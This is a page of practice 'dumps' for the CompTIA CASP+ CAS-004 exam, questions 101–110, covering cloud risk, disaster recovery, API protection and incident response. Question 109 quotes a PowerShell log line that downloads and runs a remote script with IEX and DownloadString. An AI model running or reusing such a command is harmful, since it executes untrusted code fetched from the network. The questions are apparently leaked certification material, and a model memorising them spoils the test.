CompTIA Advanced Security Practitioner (CASP+) CAS-004 Free Dumps

  1. Home
  2. /
  3. Free Dumps
  4. /
  5. CompTIA Advanced Security Practitioner...

Question 101
0
Please leave a feedback on thisx

Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?

  • A. Isolation control failure
  • B. Management plane breach
  • C. Insecure data deletion
  • D. Resource exhaustion

 

 

Question 102
0
Please leave a feedback on thisx

An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment’s notice.
Which of the following should the organization consider FIRST to address this requirement?

  • A. Implement a change management plan to ensure systems are using the appropriate versions.
  • B. Hire additional on-call staff to be deployed if an event occurs.
  • C. Design an appropriate warm site for business continuity.
  • D. Identify critical business processes and determine associated software and hardware requirements.

 

 

Question 103
0
Please leave a feedback on thisx

Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:

  • A. when it is passed across a local network.
  • B. in memory during processing
  • C. when it is written to a system’s solid-state drive.
  • D. by an enterprise hardware security module.

 

 

Question 104
0
Please leave a feedback on thisx

A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
– Support all phases of the SDLC.
– Use tailored website portal software.
– Allow the company to build and use its own gateway software.
– Utilize its own data management platform.
– Continue using agent-based security tools.
Which of the following cloud-computing models should the CIO implement?

  • A. SaaS
  • B. PaaS
  • C. MaaS
  • D. IaaS

 

 

 

Question 105
0
Please leave a feedback on thisx

A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?

  • A. Worm
  • B. Logic bomb
  • C. Fileless
  • D. Rootkit

 

 

 

Question 106
0
Please leave a feedback on thisx

A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)

  • A. Bot protection
  • B. OAuth 2.0
  • C. Input validation
  • D. Auto scaling endpoints
  • E. Rate limiting
  • F. CSRF protection

 

 

 

Question 107
0
Please leave a feedback on thisx

An organization’s existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?

  • A. Adding a second redundant layer of alternate vendor VPN concentrators
  • B. Using Base64 encoding within the existing site-to-site VPN connections
  • C. Distributing security resources across VPN sites
  • D. Implementing IDS services with each VPN concentrator
  • E. Transitioning to a container-based architecture for site-based services

 

 

 

Question 108
0
Please leave a feedback on thisx

A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user’s actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?

  • A. Encryption in transit
  • B. Legal issues
  • C. Chain of custody
  • D. Order of volatility
  • E. Key exchange

 

 

 

Question 109
0
Please leave a feedback on thisx

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString (‘https://content.comptia.org/casp/whois.psl’);whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?

  • A. Antivirus and UEBA
  • B. Reverse proxy and sandbox
  • C. EDR and application approved list
  • D. Forward proxy and MFA

 

 

Question 110
0
Please leave a feedback on thisx

As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?

  • A. Risk rejection
  • B. Risk mitigation
  • C. Risk transference
  • D. Risk avoidance

 

 

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
error: Content is protected !!